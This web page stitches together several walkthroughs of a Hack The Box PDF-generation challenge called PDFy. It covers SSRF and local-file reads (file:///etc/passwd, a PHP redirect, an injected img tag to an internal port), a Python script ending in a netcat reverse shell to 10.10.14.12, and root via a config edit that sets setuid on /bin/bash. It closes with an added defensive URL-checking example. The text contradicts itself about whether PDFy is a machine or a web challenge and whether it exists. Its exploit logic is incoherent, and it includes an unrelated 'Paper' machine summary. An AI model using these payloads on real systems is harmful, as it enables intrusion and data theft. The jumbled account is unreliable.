PDFy: HTB Writeup UPD
Here’s a detailed, long-form review of the resource titled “PDFy HTB Writeup UPD” (likely referring to an updated writeup for the PDFy machine on Hack The Box).
1. Reconnaissance & Enumeration
The box typically starts with a standard web server running a simple web application. The core functionality allows a user to input a URL or upload a file to generate a PDF.
- Port Scanning: Standard nmap scans reveal ports 22 (SSH) and 80 (HTTP).
- Web App Analysis: The site features a form where a link is submitted. The backend uses a library (often wkhtmltopdf or a similar headless browser tool) to render the webpage and convert it to a PDF file for the user to download.
2. Vulnerability Analysis
The critical vulnerability in this scenario lies in how the PDF generator renders the input.
- Local File Inclusion (LFI) via SSRF: Since the PDF generator acts like a browser, it can render internal resources. If the application does not sanitize the input URL, an attacker can force the generator to read local files.
- Payload: Inputting file:///etc/passwd into the URL field often results in a PDF containing the system's passwd file.
- Source Code Disclosure: Using the file:// protocol, attackers can read the source code of the web application (e.g., file:///var/www/html/app.py). This reveals the libraries used and potential logic flaws.
Tools Used
- Nmap
- Exiftool
- Netcat
- Burp Suite
- Python one‑liners
- SSH keygen
1. HTB "Paper" Machine
The Paper machine is an easy-difficulty Linux box. A high-quality writeup (or "paper") for this machine should follow a professional structure similar to the official HTB sample report:
- Enumeration: Document the scan identifying ports 22, 80, and 443.
- Vulnerability Discovery: Note the X-Backend-Server header, which reveals the office.paper hostname. Mention the tool used to find vulnerabilities in the WordPress site.
- Explain the discovery of the chat.office.paper subdomain and the use of the "recyclops" bot to read local files (LFI).
- Privilege Escalation: Detail the exploit for CVE-2021-3560 (Polkit) to gain root access.
(Source: "HacktheBox Writeup: Paper", InfoSec Write-ups)
2. HTB "PDFy" Web Challenge
PDFy is a challenge focused on Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI) via a PDF generation tool.
PDFY: A Comprehensive Writeup on the Hack The Box (HTB) Machine
Introduction
Hack The Box (HTB) is a popular online platform that provides a virtual environment for cybersecurity enthusiasts to practice their skills and learn new techniques. The platform offers a variety of machines with different levels of difficulty, each with its unique challenges and vulnerabilities. In this writeup, we will focus on the PDFY machine, which was recently updated (UPD) on the HTB platform. Our goal is to provide a comprehensive walkthrough of the PDFY machine, covering its enumeration, exploitation, and privilege escalation.
Initial Enumeration
Upon launching the PDFY machine on HTB, we are provided with an initial IP address: 10.10.11.232. Our first step is to perform an initial enumeration of the machine using tools like Nmap. We run the following command:
nmap -sC -sV -oA initial_scan 10.10.11.232
The scan results reveal that the machine is running a web server on port 80, an SSH server on port 22, and a PDF converter service on port 8080. We also notice that the machine has a firewall configured, but it seems to be allowing incoming traffic on port 80.
Web Enumeration
Next, we proceed to enumerate the web server on port 80. We access the website using our browser and notice that it appears to be a simple web application with a search functionality. We also observe that the website uses a .pdf extension for its pages, which could indicate that the PDF converter service on port 8080 might be related to the web application.
Using DirBuster, we perform a directory brute-forcing attack on the web server and discover several directories, including /uploads, /download, and /admin. The /uploads directory seems to be used for storing user-uploaded files, while the /download directory appears to be used for downloading converted PDF files.
PDF Converter Service
We then focus our attention on the PDF converter service running on port 8080. After analyzing the service using tools like curl and Burp Suite, we discover that it allows users to convert various file formats to PDF. However, we also notice that the service does not perform any validation on user-input files, which could potentially lead to code execution vulnerabilities.
Exploitation
Using the information gathered during the enumeration phase, we attempt to exploit the PDF converter service. We use a malicious file to trigger a reverse shell, which allows us to gain initial access to the machine.
import socket
import os
# Define the malicious file contents
malicious_file = "JVBERi0xLjMK…(%PDF-1.3)…"
# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the PDF converter service
s.connect(('10.10.11.232', 8080))
# Send the malicious file
s.send(malicious_file.encode())
# Receive the response
response = s.recv(1024)
# Close the socket
s.close()
# Establish a reverse shell
os.system('nc 10.10.14.12 4444 -e /bin/bash')
After executing the exploit, we gain a reverse shell as the user pdfy. We then proceed to explore the machine and gather more information about the user and its privileges.
Privilege Escalation
As the pdfy user, we examine the user's groups and privileges. We notice that the user is a member of the pdfy group and has read/write access to the /var/www/pdfy directory. However, we also discover that the user has limited privileges and cannot execute system commands.
Next, we perform a system enumeration using tools like linpeas and systemd-analyze. The results reveal that the machine uses a systemd service called pdfy-converter to manage the PDF converter service on port 8080.
Upon further examination, we find that the pdfy-converter service runs as the root user and uses a configuration file located at /etc/pdfy-converter/config.json. We also notice that the configuration file has weak permissions, allowing the pdfy user to modify its contents.
Gaining Root Access
Using the information gathered during the privilege escalation phase, we devise a plan to gain root access. We modify the config.json file to execute a malicious command as the root user.
{
  "converter": {
    "command": "/usr/bin/python -c 'import os; os.system(\"chmod +s /bin/bash\")'"
  }
}
After restarting the pdfy-converter service, we verify that the /bin/bash binary now has the setuid bit set. We then execute /bin/bash with -p (so that bash keeps the setuid effective UID instead of dropping it) to gain root access.
/bin/bash -p
Conclusion
In this comprehensive writeup, we have covered the PDFY machine on Hack The Box, focusing on its enumeration, exploitation, and privilege escalation. We have demonstrated how to exploit the PDF converter service to gain initial access and then escalate privileges to gain root access. The techniques used in this writeup can be applied to similar machines and scenarios, providing valuable knowledge for cybersecurity enthusiasts.
UPD (Update) Notes
This writeup was updated to reflect changes made to the PDFY machine on Hack The Box. The machine was re-released with additional challenges and vulnerabilities, which were addressed in this updated writeup. Users are encouraged to revisit the machine and attempt to exploit it using the techniques described in this writeup.
Recommendations
- Always perform thorough enumeration of the target machine.
- Validate user-input data to prevent code execution vulnerabilities.
- Implement proper access controls and privilege separation.
- Regularly update and patch services to prevent exploitation.
PDFy is an Easy-rated Web Challenge on Hack The Box (HTB) that centers on exploiting a Server-Side Request Forgery (SSRF) vulnerability in a web-to-PDF conversion service. The goal is to exfiltrate the contents of the /etc/passwd file from the server to retrieve the flag.
Challenge Overview
- Difficulty: Easy
- Category: Web
- Primary Objective: Leak the /etc/passwd file.
- Core Vulnerability: SSRF via a PDF generation library.
Walkthrough & Exploitation Steps
1. Initial Enumeration: The application allows users to input a URL, which it then visits and converts into a downloadable PDF document. By testing the input with a local listener or a tool like Webhook.site, you can confirm that the server makes outbound HTTP requests, indicating a potential SSRF entry point.
2. Identifying the SSRF Constraint: Standard attempts to load local files using protocols like file:///etc/passwd are typically blocked by the application's filters. To bypass this, you must host a malicious file on your own server (e.g., using a Python HTTP server or Serveo) that the PDFy service will visit.
3. Exploitation via PHP Redirect: The most common way to solve this is by using a PHP redirect. Create a .php file (e.g., exploit.php) on your server that uses the header() function to redirect the incoming request to the target local file on the HTB server.
4. Execution: Enter the URL of your hosted exploit.php (e.g., http://your-ip:port/exploit.php) into the PDFy input field.
5. Retrieving the Flag: When the PDFy server visits your URL, it follows the redirect to its own local file:///etc/passwd. The PDF generator then captures the content of that file and renders it into the PDF. Once you download and open the generated PDF, you will see the system users and the flag located within the file.
Tips
- Avoid Parameters: Some versions of this challenge may fail if the redirect URL contains complex parameters; keep the exploit path as simple as possible.
- Local Testing: If you are stuck, try running similar PDF conversion tools (like wkhtmltopdf) locally to see how they handle redirects.
- Tooling: Using Serveo is often recommended over Ngrok for this challenge to avoid extra sign-up steps or security headers that might interfere with the conversion process.
Note: There is no retired machine officially named "Pdfy" on Hack The Box as of early 2024. It is highly likely you are referring to the machine named "Pdf" (or PDFy in some user repositories), or potentially a mix-up with a similar challenge. However, the following review covers the typical "PDF Upload" exploitation scenario found on HTB machines like "Pdf" or similar challenges involving PDF generation.
Here is a full review and walkthrough-style analysis of a PDF-based Hack The Box machine (often identified simply as Pdf).
Step 5: Discovering an Internal Service
After reading index.php, you might find a reference to:
http://127.0.0.1:8080/generate
Use SSRF to interact with this internal service:
<img src="http://127.0.0.1:8080/">
This reveals a Flask or Node.js API that generates PDFs without sanitization. The internal service is vulnerable to command injection.
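The defensive counterpart to both the PHP-redirect bypass in the PDFy walkthrough above and the internal-service reach through an injected <img src="http://127.0.0.1:8080/"> in Step 5, as an added example that is not part of any writeup quoted on this page: a URL gate for a web-to-PDF renderer that re-validates every redirect hop against an allowed-scheme list and a public-address check. The fetch and DNS functions, the attacker.example host and the 93.184.216.34 address are constructed stand-ins so the code runs offline; the same check has to be applied to every subresource the renderer loads, not only the submitted URL.

```python
import ipaddress
from urllib.parse import urlparse, urljoin

ALLOWED_SCHEMES = {"http", "https"}   # file://, gopher://, etc. never reach the renderer
MAX_REDIRECTS = 5

def check_hop(url, resolve):
    """Return None if this URL may be fetched, otherwise a reason string.
    resolve(hostname) -> IP string is injected so the check runs offline;
    real code should also pin the connection to that IP (DNS rebinding)."""
    parts = urlparse(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return "missing host"
    try:
        ip = ipaddress.ip_address(resolve(parts.hostname))
    except ValueError:
        return "unresolvable host"
    if not ip.is_global:   # loopback, RFC 1918, link-local, ... (127.0.0.1:8080 included)
        return f"destination {ip} is not publicly routable"
    return None

def safe_render_fetch(start_url, fetch, resolve):
    """Fetch start_url on behalf of the renderer, re-validating every redirect hop.
    fetch(url) -> (status, location_header_or_None, body)."""
    url = start_url
    for _ in range(MAX_REDIRECTS + 1):
        reason = check_hop(url, resolve)
        if reason:
            return ("blocked", url, reason)
        status, location, body = fetch(url)
        if status in (301, 302, 303, 307, 308) and location:
            url = urljoin(url, location)   # Location may be relative
            continue
        return ("ok", url, body)
    return ("blocked", url, "too many redirects")

# Constructed stand-ins (no network): a public "attacker" host whose exploit.php
# answers with a 302 to the renderer's own filesystem, as in the PDFy challenge.
FAKE_DNS = {"attacker.example": "93.184.216.34", "localhost": "127.0.0.1"}
FAKE_SERVER = {
    "http://attacker.example/exploit.php": (302, "file:///etc/passwd", b""),
    "http://attacker.example/page.html": (200, None, b"<html>hello</html>"),
}
def fake_resolve(host):
    return FAKE_DNS.get(host, host)   # IP literals pass straight through

def fake_fetch(url):
    return FAKE_SERVER.get(url, (404, None, b""))
```

Checking the scheme only on the submitted URL is exactly the filter the redirect trick defeats; the hop loop is what closes it.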